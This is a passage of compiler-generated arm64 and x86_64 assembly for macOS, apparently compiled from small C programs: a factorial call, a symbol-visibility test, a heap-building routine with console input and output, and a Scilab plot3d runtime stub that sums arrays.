## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) movl $5, %edi callq _fac addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/15762474.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _use ; -- Begin function use .p2align 2 _use: ; @use .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _var_hidden@PAGE ldr w8, [x8, _var_hidden@PAGEOFF] adrp x9, _var_protected@GOTPAGE ldr x9, [x9, _var_protected@GOTPAGEOFF] ldr w9, [x9] add w8, w8, w9 adrp x9, _var_default@GOTPAGE ldr x9, [x9, _var_default@GOTPAGEOFF] ldr w9, [x9] add w8, w8, w9 adrp x9, _var@GOTPAGE ldr x9, [x9, _var@GOTPAGEOFF] ldr w9, [x9] add w8, w8, w9 str w8, [sp] ; 4-byte Folded Spill bl _func_hidden ldr w8, [sp] ; 4-byte Folded Reload add w8, w8, w0 str w8, [sp, #4] ; 4-byte Folded Spill bl _func_protected ldr w8, [sp, #4] ; 4-byte Folded Reload add w8, w8, w0 str w8, [sp, #8] ; 4-byte Folded Spill bl _func_default ldr w8, [sp, #8] ; 4-byte Folded Reload add w8, w8, w0 stur w8, [x29, #-4] ; 4-byte Folded Spill bl _func ldur w8, [x29, #-4] ; 4-byte Folded Reload add w0, w8, w0 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _use ## -- Begin function use .p2align 4, 0x90 _use: ## @use .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl _var_hidden(%rip), %eax movq _var_protected@GOTPCREL(%rip), %rcx addl (%rcx), %eax movq _var_default@GOTPCREL(%rip), %rcx addl (%rcx), %eax movq _var@GOTPCREL(%rip), %rcx addl (%rcx), %eax movl %eax, -16(%rbp) ## 4-byte Spill callq _func_hidden movl %eax, %ecx movl -16(%rbp), %eax ## 4-byte Reload addl %ecx, %eax movl %eax, -12(%rbp) ## 4-byte Spill callq _func_protected movl %eax, %ecx movl -12(%rbp), %eax ## 4-byte Reload addl %ecx, %eax movl %eax, -8(%rbp) ## 4-byte Spill callq _func_default movl %eax, %ecx movl -8(%rbp), %eax ## 4-byte Reload addl %ecx, %eax movl %eax, -4(%rbp) ## 4-byte Spill callq _func movl %eax, %ecx movl -4(%rbp), %eax ## 4-byte Reload addl %ecx, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/211080851.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _HeapTopDown ; -- Begin function HeapTopDown .p2align 2 _HeapTopDown: ; @HeapTopDown .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 str x0, [sp, #24] str w1, [sp, #20] ldr w8, [sp, #20] subs w8, w8, #1 mov w9, #2 sdiv w8, w8, w9 str w8, [sp, #16] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #16] subs w8, w8, #0 cset w8, lt tbnz w8, #0, LBB0_6 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 adrp x9, _opCount@PAGE ldr w8, [x9, _opCount@PAGEOFF] add w8, w8, #1 str w8, [x9, _opCount@PAGEOFF] ldr x8, [sp, #24] ldrsw x9, [sp, #16] ldr w8, [x8, x9, lsl #2] ldr x9, [sp, #24] ldrsw x10, [sp, #20] ldr w9, [x9, x10, lsl #2] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldr x8, [sp, #24] ldrsw x9, [sp, #16] ldr w8, [x8, x9, lsl #2] str w8, [sp, #12] ldr x8, [sp, #24] ldrsw x9, [sp, #20] ldr w8, [x8, x9, lsl #2] ldr x9, [sp, #24] ldrsw x10, [sp, #16] str w8, [x9, x10, lsl #2] ldr w8, [sp, #12] ldr x9, [sp, #24] ldrsw x10, [sp, #20] str w8, [x9, x10, lsl #2] ldr w8, [sp, #16] str w8, [sp, #20] ldr w8, [sp, #20] subs w8, w8, #1 mov w9, #2 sdiv w8, w8, w9 str w8, [sp, #16] b LBB0_5 LBB0_4: b LBB0_6 LBB0_5: ; in Loop: Header=BB0_1 Depth=1 b LBB0_1 LBB0_6: add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #128 .cfi_def_cfa_offset 128 stp x29, x30, [sp, #112] ; 16-byte Folded Spill add x29, sp, #112 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov x9, sp add x8, sp, #28 str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf str wzr, [sp, #24] b LBB1_1 LBB1_1: ; =>This Loop Header: Depth=1 ; Child Loop BB1_3 Depth 2 ldr w8, [sp, #24] ldr w9, [sp, #28] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_8 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 ldrsw x9, [sp, #24] add x8, sp, #32 str x8, [sp, #8] ; 8-byte Folded Spill add x8, x8, x9, lsl #2 mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf ldr x0, [sp, #8] ; 8-byte Folded Reload ldr w1, [sp, #24] bl _HeapTopDown str wzr, [sp, #20] b LBB1_3 LBB1_3: ; Parent Loop BB1_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #20] ldr w9, [sp, #24] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB1_6 b LBB1_4 LBB1_4: ; in Loop: Header=BB1_3 Depth=2 ldrsw x9, [sp, #20] add x8, sp, #32 ldr w9, [x8, x9, lsl #2] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.5@PAGE add x0, x0, l_.str.5@PAGEOFF bl _printf b LBB1_5 LBB1_5: ; in Loop: Header=BB1_3 Depth=2 ldr w8, [sp, #20] add w8, w8, #1 str w8, [sp, #20] b LBB1_3 LBB1_6: ; in Loop: Header=BB1_1 Depth=1 adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf b LBB1_7 LBB1_7: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #24] add w8, w8, #1 str w8, [sp, #24] b LBB1_1 LBB1_8: adrp x0, l_.str.6@PAGE add x0, x0, l_.str.6@PAGEOFF bl _printf adrp x0, l_.str.7@PAGE add x0, x0, l_.str.7@PAGEOFF bl _printf str wzr, [sp, #24] b LBB1_9 LBB1_9: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #24] ldr w9, [sp, #28] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_12 b LBB1_10 LBB1_10: ; in Loop: Header=BB1_9 Depth=1 ldrsw x9, [sp, #24] add x8, sp, #32 ldr w9, [x8, x9, lsl #2] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.8@PAGE add x0, x0, l_.str.8@PAGEOFF bl _printf b LBB1_11 LBB1_11: ; in Loop: Header=BB1_9 Depth=1 ldr w8, [sp, #24] add w8, w8, #1 str w8, [sp, #24] b LBB1_9 LBB1_12: adrp x0, l_.str.6@PAGE add x0, x0, l_.str.6@PAGEOFF bl _printf adrp x8, _opCount@PAGE ldr w9, [x8, _opCount@PAGEOFF] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.9@PAGE add x0, x0, l_.str.9@PAGEOFF bl _printf adrp x0, l_.str.10@PAGE add x0, x0, l_.str.10@PAGEOFF bl _printf mov w0, #0 bl _exit .cfi_endproc ; -- End function .globl _opCount ; @opCount .zerofill __DATA,__common,_opCount,4,2 .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Enter the size of elements : " l_.str.1: ; @.str.1 .asciz "%d" l_.str.2: ; @.str.2 .asciz "Enter the elements : " l_.str.3: ; @.str.3 .asciz "\n" l_.str.4: ; @.str.4 .asciz "The Array is getting in Heap : \n\n" l_.str.5: ; @.str.5 .asciz "%d " l_.str.6: ; @.str.6 .asciz "\n\n" l_.str.7: ; @.str.7 .asciz "Orgnized Heap Array is : \n\n" l_.str.8: ; @.str.8 .asciz "%d\t" l_.str.9: ; @.str.9 .asciz "Opcount of HeapTopDown is = %d " l_.str.10: ; @.str.10 .asciz "\n\n\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _HeapTopDown ## -- Begin function HeapTopDown .p2align 4, 0x90 _HeapTopDown: ## @HeapTopDown .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) movl -12(%rbp), %eax subl $1, %eax movl $2, %ecx cltd idivl %ecx movl %eax, -16(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 cmpl $0, -16(%rbp) jl LBB0_6 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movl _opCount(%rip), %eax addl $1, %eax movl %eax, _opCount(%rip) movq -8(%rbp), %rax movslq -16(%rbp), %rcx movl (%rax,%rcx,4), %eax movq -8(%rbp), %rcx movslq -12(%rbp), %rdx cmpl (%rcx,%rdx,4), %eax jge LBB0_4 ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movq -8(%rbp), %rax movslq -16(%rbp), %rcx movl (%rax,%rcx,4), %eax movl %eax, -20(%rbp) movq -8(%rbp), %rax movslq -12(%rbp), %rcx movl (%rax,%rcx,4), %edx movq -8(%rbp), %rax movslq -16(%rbp), %rcx movl %edx, (%rax,%rcx,4) movl -20(%rbp), %edx movq -8(%rbp), %rax movslq -12(%rbp), %rcx movl %edx, (%rax,%rcx,4) movl -16(%rbp), %eax movl %eax, -12(%rbp) movl -12(%rbp), %eax subl $1, %eax movl $2, %ecx cltd idivl %ecx movl %eax, -16(%rbp) jmp LBB0_5 LBB0_4: jmp LBB0_6 LBB0_5: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_1 LBB0_6: popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $112, %rsp leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq L_.str.1(%rip), %rdi leaq -84(%rbp), %rsi movb $0, %al callq _scanf leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf movl $0, -88(%rbp) LBB1_1: ## =>This Loop Header: Depth=1 ## Child Loop BB1_3 Depth 2 movl -88(%rbp), %eax cmpl -84(%rbp), %eax jge LBB1_8 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 movslq -88(%rbp), %rax leaq -80(%rbp), %rsi shlq $2, %rax addq %rax, %rsi leaq L_.str.1(%rip), %rdi movb $0, %al callq _scanf leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf leaq L_.str.4(%rip), %rdi movb $0, %al callq _printf leaq -80(%rbp), %rdi movl -88(%rbp), %esi callq _HeapTopDown movl $0, -92(%rbp) LBB1_3: ## Parent Loop BB1_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -92(%rbp), %eax cmpl -88(%rbp), %eax jg LBB1_6 ## %bb.4: ## in Loop: Header=BB1_3 Depth=2 movslq -92(%rbp), %rax movl -80(%rbp,%rax,4), %esi leaq L_.str.5(%rip), %rdi movb $0, %al callq _printf ## %bb.5: ## in Loop: Header=BB1_3 Depth=2 movl -92(%rbp), %eax addl $1, %eax movl %eax, -92(%rbp) jmp LBB1_3 LBB1_6: ## in Loop: Header=BB1_1 Depth=1 leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf ## %bb.7: ## in Loop: Header=BB1_1 Depth=1 movl -88(%rbp), %eax addl $1, %eax movl %eax, -88(%rbp) jmp LBB1_1 LBB1_8: leaq L_.str.6(%rip), %rdi movb $0, %al callq _printf leaq L_.str.7(%rip), %rdi movb $0, %al callq _printf movl $0, -88(%rbp) LBB1_9: ## =>This Inner Loop Header: Depth=1 movl -88(%rbp), %eax cmpl -84(%rbp), %eax jge LBB1_12 ## %bb.10: ## in Loop: Header=BB1_9 Depth=1 movslq -88(%rbp), %rax movl -80(%rbp,%rax,4), %esi leaq L_.str.8(%rip), %rdi movb $0, %al callq _printf ## %bb.11: ## in Loop: Header=BB1_9 Depth=1 movl -88(%rbp), %eax addl $1, %eax movl %eax, -88(%rbp) jmp LBB1_9 LBB1_12: leaq L_.str.6(%rip), %rdi xorl %eax, %eax movl %eax, -96(%rbp) ## 4-byte Spill movb %al, -97(%rbp) ## 1-byte Spill callq _printf ## kill: def $ecx killed $eax movb -97(%rbp), %al ## 1-byte Reload movl _opCount(%rip), %esi leaq L_.str.9(%rip), %rdi callq _printf ## kill: def $ecx killed $eax movb -97(%rbp), %al ## 1-byte Reload leaq L_.str.10(%rip), %rdi callq _printf movl -96(%rbp), %edi ## 4-byte Reload callq _exit .cfi_endproc ## -- End function .globl _opCount ## @opCount .zerofill __DATA,__common,_opCount,4,2 .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Enter the size of elements : " L_.str.1: ## @.str.1 .asciz "%d" L_.str.2: ## @.str.2 .asciz "Enter the elements : " L_.str.3: ## @.str.3 .asciz "\n" L_.str.4: ## @.str.4 .asciz "The Array is getting in Heap : \n\n" L_.str.5: ## @.str.5 .asciz "%d " L_.str.6: ## @.str.6 .asciz "\n\n" L_.str.7: ## @.str.7 .asciz "Orgnized Heap Array is : \n\n" L_.str.8: ## @.str.8 .asciz "%d\t" L_.str.9: ## @.str.9 .asciz "Opcount of HeapTopDown is = %d " L_.str.10: ## @.str.10 .asciz "\n\n\n" .subsections_via_symbols
the_stack_data/211080768.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _scilab_rt_plot3d_i2i2d2i0i0s0d2_ ; -- Begin function scilab_rt_plot3d_i2i2d2i0i0s0d2_ .p2align 2 _scilab_rt_plot3d_i2i2d2i0i0s0d2_: ; @scilab_rt_plot3d_i2i2d2i0i0s0d2_ .cfi_startproc ; %bb.0: sub sp, sp, #176 .cfi_def_cfa_offset 176 stp x29, x30, [sp, #160] ; 16-byte Folded Spill add x29, sp, #160 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 ldr x14, [x29, #16] ldr w13, [x29, #24] ldr w12, [x29, #28] ldr x11, [x29, #32] ldr w10, [x29, #40] ldr w9, [x29, #44] ldr x8, [x29, #48] stur w0, [x29, #-4] stur w1, [x29, #-8] stur x2, [x29, #-16] stur w3, [x29, #-20] stur w4, [x29, #-24] stur x5, [x29, #-32] stur w6, [x29, #-36] stur w7, [x29, #-40] stur x14, [x29, #-48] stur w13, [x29, #-52] stur w12, [x29, #-56] stur x11, [x29, #-64] stur w10, [x29, #-68] stur w9, [x29, #-72] str x8, [sp, #80] ldur w8, [x29, #-8] ; kill: def $x8 killed $w8 str x8, [sp, #16] ; 8-byte Folded Spill ldur w8, [x29, #-24] ; kill: def $x8 killed $w8 str x8, [sp, #24] ; 8-byte Folded Spill ldur w8, [x29, #-40] ; kill: def $x8 killed $w8 str x8, [sp, #32] ; 8-byte Folded Spill ldur w8, [x29, #-72] ; kill: def $x8 killed $w8 str x8, [sp, #40] ; 8-byte Folded Spill str wzr, [sp, #68] str wzr, [sp, #64] movi d0, #0000000000000000 str d0, [sp, #56] str d0, [sp, #48] str wzr, [sp, #76] b LBB0_1 LBB0_1: ; =>This Loop Header: Depth=1 ; Child Loop BB0_3 Depth 2 ldr w8, [sp, #76] ldur w9, [x29, #-4] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_8 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 str wzr, [sp, #72] b LBB0_3 LBB0_3: ; Parent Loop BB0_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #72] ldur w9, [x29, #-8] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_6 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_3 Depth=2 ldr x10, [sp, #16] ; 8-byte Folded Reload ldur x8, [x29, #-16] ldrsw x9, [sp, #76] mul x9, x9, x10 add x8, x8, x9, lsl #2 ldrsw x9, [sp, #72] ldr w9, [x8, x9, lsl #2] ldr w8, [sp, #68] add w8, w8, w9 str w8, [sp, #68] b LBB0_5 LBB0_5: ; in Loop: Header=BB0_3 Depth=2 ldr w8, [sp, #72] add w8, w8, #1 str w8, [sp, #72] b LBB0_3 LBB0_6: ; in Loop: Header=BB0_1 Depth=1 b LBB0_7 LBB0_7: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #76] add w8, w8, #1 str w8, [sp, #76] b LBB0_1 LBB0_8: ldr w9, [sp, #68] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf str wzr, [sp, #76] b LBB0_9 LBB0_9: ; =>This Loop Header: Depth=1 ; Child Loop BB0_11 Depth 2 ldr w8, [sp, #76] ldur w9, [x29, #-20] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_16 b LBB0_10 LBB0_10: ; in Loop: Header=BB0_9 Depth=1 str wzr, [sp, #72] b LBB0_11 LBB0_11: ; Parent Loop BB0_9 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #72] ldur w9, [x29, #-24] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_14 b LBB0_12 LBB0_12: ; in Loop: Header=BB0_11 Depth=2 ldr x10, [sp, #24] ; 8-byte Folded Reload ldur x8, [x29, #-32] ldrsw x9, [sp, #76] mul x9, x9, x10 add x8, x8, x9, lsl #2 ldrsw x9, [sp, #72] ldr w9, [x8, x9, lsl #2] ldr w8, [sp, #64] add w8, w8, w9 str w8, [sp, #64] b LBB0_13 LBB0_13: ; in Loop: Header=BB0_11 Depth=2 ldr w8, [sp, #72] add w8, w8, #1 str w8, [sp, #72] b LBB0_11 LBB0_14: ; in Loop: Header=BB0_9 Depth=1 b LBB0_15 LBB0_15: ; in Loop: Header=BB0_9 Depth=1 ldr w8, [sp, #76] add w8, w8, #1 str w8, [sp, #76] b LBB0_9 LBB0_16: ldr w9, [sp, #64] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf str wzr, [sp, #76] b LBB0_17 LBB0_17: ; =>This Loop Header: Depth=1 ; Child Loop BB0_19 Depth 2 ldr w8, [sp, #76] ldur w9, [x29, #-36] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_24 b LBB0_18 LBB0_18: ; in Loop: Header=BB0_17 Depth=1 str wzr, [sp, #72] b LBB0_19 LBB0_19: ; Parent Loop BB0_17 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #72] ldur w9, [x29, #-40] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_22 b LBB0_20 LBB0_20: ; in Loop: Header=BB0_19 Depth=2 ldr x10, [sp, #32] ; 8-byte Folded Reload ldur x8, [x29, #-48] ldrsw x9, [sp, #76] mul x9, x9, x10 add x8, x8, x9, lsl #3 ldrsw x9, [sp, #72] ldr d1, [x8, x9, lsl #3] ldr d0, [sp, #56] fadd d0, d0, d1 str d0, [sp, #56] b LBB0_21 LBB0_21: ; in Loop: Header=BB0_19 Depth=2 ldr w8, [sp, #72] add w8, w8, #1 str w8, [sp, #72] b LBB0_19 LBB0_22: ; in Loop: Header=BB0_17 Depth=1 b LBB0_23 LBB0_23: ; in Loop: Header=BB0_17 Depth=1 ldr w8, [sp, #76] add w8, w8, #1 str w8, [sp, #76] b LBB0_17 LBB0_24: ldr d0, [sp, #56] mov x8, sp str d0, [x8] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf ldur w9, [x29, #-52] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF str x0, [sp, #8] ; 8-byte Folded Spill bl _printf ldr x0, [sp, #8] ; 8-byte Folded Reload ldur w9, [x29, #-56] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] bl _printf ldur x8, [x29, #-64] mov x9, sp str x8, [x9] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf str wzr, [sp, #76] b LBB0_25 LBB0_25: ; =>This Loop Header: Depth=1 ; Child Loop BB0_27 Depth 2 ldr w8, [sp, #76] ldur w9, [x29, #-68] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_32 b LBB0_26 LBB0_26: ; in Loop: Header=BB0_25 Depth=1 str wzr, [sp, #72] b LBB0_27 LBB0_27: ; Parent Loop BB0_25 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #72] ldur w9, [x29, #-72] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_30 b LBB0_28 LBB0_28: ; in Loop: Header=BB0_27 Depth=2 ldr x10, [sp, #40] ; 8-byte Folded Reload ldr x8, [sp, #80] ldrsw x9, [sp, #76] mul x9, x9, x10 add x8, x8, x9, lsl #3 ldrsw x9, [sp, #72] ldr d1, [x8, x9, lsl #3] ldr d0, [sp, #48] fadd d0, d0, d1 str d0, [sp, #48] b LBB0_29 LBB0_29: ; in Loop: Header=BB0_27 Depth=2 ldr w8, [sp, #72] add w8, w8, #1 str w8, [sp, #72] b LBB0_27 LBB0_30: ; in Loop: Header=BB0_25 Depth=1 b LBB0_31 LBB0_31: ; in Loop: Header=BB0_25 Depth=1 ldr w8, [sp, #76] add w8, w8, #1 str w8, [sp, #76] b LBB0_25 LBB0_32: ldr d0, [sp, #48] mov x8, sp str d0, [x8] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf ldp x29, x30, [sp, #160] ; 16-byte Folded Reload add sp, sp, #176 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d" l_.str.1: ; @.str.1 .asciz "%f" l_.str.2: ; @.str.2 .asciz "%s" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _scilab_rt_plot3d_i2i2d2i0i0s0d2_ ## -- Begin function scilab_rt_plot3d_i2i2d2i0i0s0d2_ .p2align 4, 0x90 _scilab_rt_plot3d_i2i2d2i0i0s0d2_: ## @scilab_rt_plot3d_i2i2d2i0i0s0d2_ .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $96, %rsp movq 80(%rbp), %rax movl 72(%rbp), %eax movl 64(%rbp), %eax movq 56(%rbp), %rax movl 48(%rbp), %eax movl 40(%rbp), %eax movq 32(%rbp), %rax movl 24(%rbp), %eax movl 16(%rbp), %eax movl %edi, -4(%rbp) movl %esi, -8(%rbp) movq %rdx, -16(%rbp) movl %ecx, -20(%rbp) movl %r8d, -24(%rbp) movq %r9, -32(%rbp) movl -8(%rbp), %eax ## kill: def $rax killed $eax movq %rax, -96(%rbp) ## 8-byte Spill movl -24(%rbp), %eax ## kill: def $rax killed $eax movq %rax, -88(%rbp) ## 8-byte Spill movl 24(%rbp), %eax ## kill: def $rax killed $eax movq %rax, -80(%rbp) ## 8-byte Spill movl 72(%rbp), %eax ## kill: def $rax killed $eax movq %rax, -72(%rbp) ## 8-byte Spill movl $0, -44(%rbp) movl $0, -48(%rbp) xorps %xmm0, %xmm0 movsd %xmm0, -56(%rbp) xorps %xmm0, %xmm0 movsd %xmm0, -64(%rbp) movl $0, -36(%rbp) LBB0_1: ## =>This Loop Header: Depth=1 ## Child Loop BB0_3 Depth 2 movl -36(%rbp), %eax cmpl -4(%rbp), %eax jge LBB0_8 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movl $0, -40(%rbp) LBB0_3: ## Parent Loop BB0_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -40(%rbp), %eax cmpl -8(%rbp), %eax jge LBB0_6 ## %bb.4: ## in Loop: Header=BB0_3 Depth=2 movq -96(%rbp), %rdx ## 8-byte Reload movq -16(%rbp), %rax movslq -36(%rbp), %rcx imulq %rdx, %rcx shlq $2, %rcx addq %rcx, %rax movslq -40(%rbp), %rcx movl (%rax,%rcx,4), %eax addl -44(%rbp), %eax movl %eax, -44(%rbp) ## %bb.5: ## in Loop: Header=BB0_3 Depth=2 movl -40(%rbp), %eax addl $1, %eax movl %eax, -40(%rbp) jmp LBB0_3 LBB0_6: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_7 LBB0_7: ## in Loop: Header=BB0_1 Depth=1 movl -36(%rbp), %eax addl $1, %eax movl %eax, -36(%rbp) jmp LBB0_1 LBB0_8: movl -44(%rbp), %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf movl $0, -36(%rbp) LBB0_9: ## =>This Loop Header: Depth=1 ## Child Loop BB0_11 Depth 2 movl -36(%rbp), %eax cmpl -20(%rbp), %eax jge LBB0_16 ## %bb.10: ## in Loop: Header=BB0_9 Depth=1 movl $0, -40(%rbp) LBB0_11: ## Parent Loop BB0_9 Depth=1 ## => This Inner Loop Header: Depth=2 movl -40(%rbp), %eax cmpl -24(%rbp), %eax jge LBB0_14 ## %bb.12: ## in Loop: Header=BB0_11 Depth=2 movq -88(%rbp), %rdx ## 8-byte Reload movq -32(%rbp), %rax movslq -36(%rbp), %rcx imulq %rdx, %rcx shlq $2, %rcx addq %rcx, %rax movslq -40(%rbp), %rcx movl (%rax,%rcx,4), %eax addl -48(%rbp), %eax movl %eax, -48(%rbp) ## %bb.13: ## in Loop: Header=BB0_11 Depth=2 movl -40(%rbp), %eax addl $1, %eax movl %eax, -40(%rbp) jmp LBB0_11 LBB0_14: ## in Loop: Header=BB0_9 Depth=1 jmp LBB0_15 LBB0_15: ## in Loop: Header=BB0_9 Depth=1 movl -36(%rbp), %eax addl $1, %eax movl %eax, -36(%rbp) jmp LBB0_9 LBB0_16: movl -48(%rbp), %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf movl $0, -36(%rbp) LBB0_17: ## =>This Loop Header: Depth=1 ## Child Loop BB0_19 Depth 2 movl -36(%rbp), %eax cmpl 16(%rbp), %eax jge LBB0_24 ## %bb.18: ## in Loop: Header=BB0_17 Depth=1 movl $0, -40(%rbp) LBB0_19: ## Parent Loop BB0_17 Depth=1 ## => This Inner Loop Header: Depth=2 movl -40(%rbp), %eax cmpl 24(%rbp), %eax jge LBB0_22 ## %bb.20: ## in Loop: Header=BB0_19 Depth=2 movq -80(%rbp), %rdx ## 8-byte Reload movq 32(%rbp), %rax movslq -36(%rbp), %rcx imulq %rdx, %rcx shlq $3, %rcx addq %rcx, %rax movslq -40(%rbp), %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero addsd -56(%rbp), %xmm0 movsd %xmm0, -56(%rbp) ## %bb.21: ## in Loop: Header=BB0_19 Depth=2 movl -40(%rbp), %eax addl $1, %eax movl %eax, -40(%rbp) jmp LBB0_19 LBB0_22: ## in Loop: Header=BB0_17 Depth=1 jmp LBB0_23 LBB0_23: ## in Loop: Header=BB0_17 Depth=1 movl -36(%rbp), %eax addl $1, %eax movl %eax, -36(%rbp) jmp LBB0_17 LBB0_24: movsd -56(%rbp), %xmm0 ## xmm0 = mem[0],zero leaq L_.str.1(%rip), %rdi movb $1, %al callq _printf movl 40(%rbp), %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf movl 48(%rbp), %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf movq 56(%rbp), %rsi leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf movl $0, -36(%rbp) LBB0_25: ## =>This Loop Header: Depth=1 ## Child Loop BB0_27 Depth 2 movl -36(%rbp), %eax cmpl 64(%rbp), %eax jge LBB0_32 ## %bb.26: ## in Loop: Header=BB0_25 Depth=1 movl $0, -40(%rbp) LBB0_27: ## Parent Loop BB0_25 Depth=1 ## => This Inner Loop Header: Depth=2 movl -40(%rbp), %eax cmpl 72(%rbp), %eax jge LBB0_30 ## %bb.28: ## in Loop: Header=BB0_27 Depth=2 movq -72(%rbp), %rdx ## 8-byte Reload movq 80(%rbp), %rax movslq -36(%rbp), %rcx imulq 